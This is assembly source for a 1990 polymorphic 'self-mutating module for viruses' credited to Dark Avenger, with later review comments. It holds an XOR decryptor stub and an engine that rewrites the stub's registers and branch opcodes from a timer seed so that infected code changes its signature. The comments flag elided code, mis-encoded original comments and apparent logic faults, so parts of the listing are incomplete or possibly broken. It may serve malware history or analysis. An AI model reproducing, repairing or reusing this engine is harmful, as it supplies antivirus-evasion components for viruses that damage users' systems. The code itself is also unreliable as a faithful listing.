        page    ,132
        name    mutate
        title   MUTATE - A Self-mutating Module for Viruses
;-----------------------------------------------------------------------
; Assembler dialect: MASM/TASM-style (page, name, title, .radix, .model,
; offset, dup, .errnz).  The "NASM" tag on the hosting page is the site's
; language guess, not the file's syntax.
; `.radix 16` makes every numeric literal in this file hexadecimal
; (100 = 100h, 46C = 46Ch, 4C00 = 4C00h, 1A03 = 1A03h, ...).
;-----------------------------------------------------------------------
        .radix  16
        .model  tiny                    ; one segment: CS = DS = SS
        .code

; This source code is a copyrighted material
; (C) 1990 DARK AVENGER

        org     100                     ; .COM image: code begins at offset 100h

timer   equ     46C                     ; absolute address 0000:046C (BIOS timer tick count,
                                        ; low word); read by prog as the mutation seed

start:
        jmp     prog                    ; demo entry point: run the harness, not the decryptor stub
;-----------------------------------------------------------------------
; v_entry - decryptor stub that is meant to precede an XOR-encrypted body
; lying between `encrypt` and `top`.
; The original comment block here is Bulgarian text that arrived
; mis-encoded and cannot be recovered verbatim; its legible fragments
; ("v_entry", "JMP", "100", ".COM") agree with what the code does: it
; assumes offset 100h of the host .COM holds a 3-byte near JMP whose
; displacement word at 101h leads to this entry point.
; In:    AX = host's entry AX (swapped into BP, not used here)
; Out:   at the end of the stub SI = v_entry (see `add si` below);
;        DX = XOR of the body words minus one (see the trailing note)
; Clobb: AX, CX, DX, SI, DI, BP, flags
; Layout: every byte from v_entry through encrypt+3 (36 bytes, one per
; xlatdat entry) is position-sensitive - mutate patches bytes at fixed
; offsets from v_entry (15h and 1Eh via ds:[..], plus the positions
; flagged in xlatdat).  Do not reorder or resize anything in here.
;-----------------------------------------------------------------------
v_entry:
        xchg    ax,bp                   ; park the entry AX in BP (BP is not touched below)
        mov     si,100
        inc     si                      ; SI = 101h = the JMP's displacement word
        add     si,[si]                 ; SI = 101h + disp = JMP target - 2 (target = 103h + disp)
        mov     di,si                   ; DI = same base for the second pass
        xor     dx,dx                   ; DX = running XOR of the body words
        mov     cx,(top-encrypt)/2-1    ; number of words in [encrypt,top) minus one (dec/jns loop)
        push    cx                      ; saved for the decrypt pass
calcgen:
        xor     dx,[si+encrypt-v_entry+2]       ; DX ^= a body word
        org     $-1                     ; back up one byte: the `inc si` opcode (46h) overwrites the
                                        ; last byte the assembler emitted for the xor above
        inc     si
        inc     si                      ; SI += 2 (one word per iteration)
        dec     cx
        jns     calcgen                 ; runs CX+1 times; by byte count (4-byte xor encoding) this
                                        ; opcode is v_entry+15h, which mutate swaps between jns/jge
        pop     ax                      ; AX = word count - 1 again
decrypt:
        xor     [di+encrypt-v_entry+2],dx       ; body word ^= DX
        org     $-1                     ; same overlay: `inc di` (47h) replaces the last xor byte
        inc     di
        inc     di
        dec     ax
        jns     decrypt                 ; v_entry+1Eh by the same count; also swapped jns/jge by mutate
encrypt:
        xchg    si,si                   ; placeholders (no-ops as assembled): xlatdat marks the r/m
        xchg    dx,dx                   ; field of both (offsets 21h, 23h) as replaceable, so the
                                        ; mutated stub hands its pointer/key registers back to SI/DX
        add     si,encrypt-top+2        ; SI = v_entry, given SI started at v_entry-2 and advanced top-encrypt bytes
        dec     dx

; Original comment (mis-encoded) evidently describes the register state
; at this point; legible fragments are "DX = -" and "SI = ... v_entry".
; From the code: SI = v_entry; DX = (XOR of the encrypted words) - 1.
; Whether that equals minus a length depends on how the encryptor chose
; the key, which is not part of this file - TODO confirm.
; NOTE(review): with a 16-bit displacement encoding of the two xor
; instructions (which the 15h/1Eh patch offsets imply), the `org $-1`
; overlay places the inc opcode into the displacement's high byte, so
; the run-time displacement is not the symbolic encrypt-v_entry+2.
; Verify against the assembler's listing before relying on this addressing.
; . . .
;-----------------------------------------------------------------------
; prog - demo harness: seeds the engine from the BIOS tick counter, runs
; one mutation of the stub above, and returns to DOS.  Not part of the
; module proper.
; Clobb: AX, plus everything mutate clobbers
;-----------------------------------------------------------------------
prog:
        push    ds
        xor     ax,ax
        mov     ds,ax                   ; DS = 0 to address the BIOS data area
        mov     ax,ds:[timer]           ; AX = word at 0000:046C (tick count low word) - the seed
        pop     ds
        call    mutate                  ; AX -> seed
        mov     ax,4C00                 ; DOS terminate, exit code 0
        int     21
;-----------------------------------------------------------------------
; mutate - rewrite the decryptor stub (v_entry .. encrypt+3) in place with
; a different register assignment and different loop-branch opcodes,
; chosen by the seed in AX.
; The original comment here is mis-encoded Bulgarian; its legible
; fragment "AX = ... (0:46C)" matches the caller: AX is the seed, taken
; from the timer tick count by prog.
; In:    AX = seed
; Out:   DS = CS; ds:[15], ds:[1E], muttbl and the xlatdat-flagged bytes
;        of v_entry are overwritten
; Clobb: AX, BX, CX, DX, SI, DI, DF (cleared), flags
; Seed use: AX mod 90h (144 = 2*2*6*6) is split into two single bits
; (the two branch opcodes, via getcode) and two base-6 digits (the
; register permutations), i.e. 144 distinct outputs.
; NOTE(review): ds:[15] / ds:[1E] are absolute DS offsets, while the
; xlatdat-driven patches below are addressed relative to v_entry.  As
; assembled here (org 100, DS = CS) 15h/1Eh fall inside the PSP rather
; than on v_entry+15h/+1Eh, the two `jns` opcodes the 79h/7Dh values
; fit.  Presumably the real deployment has the stub at DS:0 - confirm.
;-----------------------------------------------------------------------
mutate:
        cld                             ; lodsb below walks forward
        xor     dx,dx
        push    cs
        pop     ds                      ; DS = CS: stub and tables are in this segment
        mov     cx,90
        div     cx                      ; DX = seed mod 90h (0..143); AX = quotient (not used)
        call    getcode                 ; one bit of DX -> AL = 79h (jns) or 7Dh (jge)
        mov     ds:[15],al              ; branch opcode of the calcgen loop
        call    getcode
        mov     ds:[1E],al              ; branch opcode of the decrypt loop
        xchg    ax,dx                   ; AX = remaining seed bits, 0..35
        mov     dl,6
        div     dl                      ; AL = AX / 6 (0..5), AH = AX mod 6 (0..5)
        mov     si,offset muttbl        ; SI = output cursor into the 7-byte muttbl
        mov     bx,offset xlatbl1
        call    buildblk                ; muttbl[0..1] = permutation(AL) of {0,1,2}; AL = its third
        mov     [si],al
        inc     si                      ; muttbl[2] = that third register
        mov     bx,offset xlatbl2
        call    buildblk2               ; muttbl[3..4] = first two of permutation(AH) of {3,6,7}
        mov     bx,offset xlatbl3
        call    buildblk2               ; muttbl[5..6] = the same permutation(AH) applied to {7,4,5}
        mov     bx,offset muttbl-1      ; XLAT base: xlatdat indices are 1-based, 0 = "no change"
        mov     si,offset xlatdat
        mov     cx,xlatbl1-xlatdat      ; 36 entries, one per stub byte
nextgen:
        lodsb                           ; AL = xlatdat[k] for stub byte v_entry+k
        test    al,al
        jz      cantchg                 ; 0: byte k carries no register field
        push    ax
        and     al,111b                 ; bits 2..0: muttbl index for the low (r/m) field
        xlat                            ; AL = replacement value for that field
        mov     ah,0F8                  ; AND mask: keep bits 7..3, clear the low 3 bits
        xchg    ax,dx                   ; DH = mask, DL = replacement bits
        pop     ax
        push    cx
        mov     cl,3
        shr     al,cl                   ; bits 7..3: muttbl index for the reg field, if any
        jz      skipxlat                ; none: only the low field changes
        xlat                            ; AL = replacement reg value
        shl     al,cl                   ; move it to bits 5..3
        jz      skipxlat                ; NOTE(review): as listed, a reg value of 0 (AX) skips the
        xlat                            ;   rewrite and keeps the old reg field, and this second xlat
        shl     al,cl                   ;   indexes muttbl with reg<<3 (>= 8, beyond its 7 bytes) for
                                        ;   any other reg - looks like a transcription or logic fault;
                                        ;   check against the original listing.
        or      dl,al                   ; DL = (reg << 3) | rm
        mov     dh,0c0                  ; AND mask: keep only the mod bits (7..6)
skipxlat:
        pop     cx
        and     [si-(xlatdat+1-v_entry)],dh     ; SI = xlatdat+k+1, so this is v_entry+k:
        or      [si-(xlatdat+1-v_entry)],dl     ; clear the field(s), then OR in the new encoding
cantchg:
        loop    nextgen
        ret
;-----------------------------------------------------------------------
; buildblk / buildblk2 - store two entries of a 3-byte table in a
; permuted order and return the third.
; In:    BX = 3-byte table (xlatbl1/2/3); SI = output cursor
;        AL (buildblk) or AH (buildblk2) = permutation selector, 0..5
; Out:   [SI] = table[first], [SI+1] = table[second]; SI += 2
;        AL = table[third]; AH preserved
; Clobb: DL, flags
; For selector a in 0..5: second = a>>1, first = (second+1+(a&1)) mod 3,
; third = the remaining index.  Over those six values first|second equals
; first+second, so `xor 3` yields 3-first-second; each a gives a distinct
; ordering of 0..2.  Selectors outside 0..5 are not handled.
;-----------------------------------------------------------------------
buildblk2:
        mov     al,ah                   ; selector is in AH; fall through
buildblk:
        shr     al,1                    ; AL = a>>1 (second), CF = a&1
        mov     dl,al                   ; DL = second
        push    ax                      ; keep (second, AH); neither mov nor push alters CF
        adc     al,1                    ; AL = second + 1 + (a&1)
        cmp     al,3
        jb      setblk
        sub     al,3                    ; wrap into 0..2 -> first
setblk:
        or      dl,al                   ; DL = first|second (= first+second here)
        xlat                            ; AL = table[first]
        mov     [si],al
        inc     si
        pop     ax                      ; AL = second, AH restored
        xlat                            ; AL = table[second]
        mov     [si],al
        inc     si
        mov     al,dl
        xor     al,3                    ; AL = third = 3 - first - second
        xlat                            ; AL = table[third], returned (caller decides whether to store)
        ret
;-----------------------------------------------------------------------
; getcode - take one bit off DX and pick a loop-branch opcode.
; In:    DX = bit pool
; Out:   DX >>= 1; AL = 79h (jns) if the shifted-out bit was 0,
;        else 79h | 100b = 7Dh (jge).  After a `dec` of a count below
;        8000h both conditions agree, so either opcode closes the
;        v_entry loops the same way.
; Clobb: AL, flags
;-----------------------------------------------------------------------
getcode:
        shr     dx,1                    ; CF = low bit of DX
        mov     al,79
        jnc     got
        or      al,100b                 ; 79h -> 7Dh
got:
        ret
; xlatdat - one byte per stub byte v_entry+0 .. v_entry+23h (36 entries).
; 0 = leave the byte alone.  Otherwise bits 2..0 hold a 1-based muttbl
; index for the low field (r/m, or the register in a one-byte opcode)
; and bits 5..3, when non-zero, a 1-based index for the reg field.
; Indices 1..3 select the {AX,CX,DX} slots, 4..5 the {BX,SI,DI} slots,
; 6..7 the matching r/m base-register codes (see muttbl).  The offsets
; noted below assume the 4-byte encoding of the two xor instructions.
xlatdat db 0,4,0,0,4,0,26,0             ; +1 mov si,imm | +4 inc si | +6 add si,[si] modrm (reg 4, rm 6)
        db 2c,0,9,2,0,0,2,0             ; +8 mov di,si modrm | +A xor dx,dx modrm | +B mov cx,imm | +E push cx
        db 0e,0,4,4,2,0,0,3             ; +10 xor dx,[si+..] modrm | +12,+13 inc si | +14 dec cx | +17 pop ax
        db 0,0f,0,5,5,3,0,0             ; +19 xor [di+..],dx modrm | +1B,+1C inc di | +1D dec ax
        db 0,4,0,1                      ; +21 xchg si,si modrm | +23 xchg dx,dx modrm

; Source tables permuted by buildblk; muttbl is filled as
; [xlatbl1 perm: 3] [xlatbl2 perm: first two] [xlatbl3 perm: first two].
xlatbl1 db 0,1,2                        ; AX, CX, DX (register numbers)
xlatbl2 db 3,6,7                        ; BX, SI, DI (register numbers)
xlatbl3 db 7,4,5                        ; r/m codes for [BX], [SI], [DI] - same order as xlatbl2

chksum  dw 1A03                         ; balancing word; original comment is mis-encoded - see the note below
; Original comment (mis-encoded Bulgarian, not recoverable verbatim).
; Legible fragments: "XOR", "16-", "encrypt", "top", "chksum", "errnz";
; it evidently explains chksum in terms of the assertions below:
; (top-encrypt) mod 4 == 2 forces an odd number of 16-bit words in
; [encrypt,top), so XORing every word with one key K changes the XOR
; over the whole range by exactly K; the calcgen loop in v_entry computes
; that XOR to recover its key.  Presumably chksum is set so the XOR of
; the unencrypted words takes a known value - the 1A03 above is specific
; to this layout and must be recomputed if anything between encrypt and
; top changes.  TODO confirm the intended balance value.
;
; . . . (presumably the remaining code sits between chksum and top)

top:
        .errnz  (encrypt-v_entry) mod 2         ; stub length is even
        .errnz  (top-encrypt) mod 4-2           ; (top-encrypt) mod 4 == 2: odd word count, see above
        .errnz  (top-v_entry) mod 2             ; whole region is a whole number of words
        .errnz  (chksum-v_entry) mod 2          ; chksum lies on a word boundary of that region

muttbl  db 7 dup(?)                             ; scratch filled by mutate: 3 + 2 + 2 register codes
                                                ; (original comment mis-encoded; legible: "... mutate")

        end     start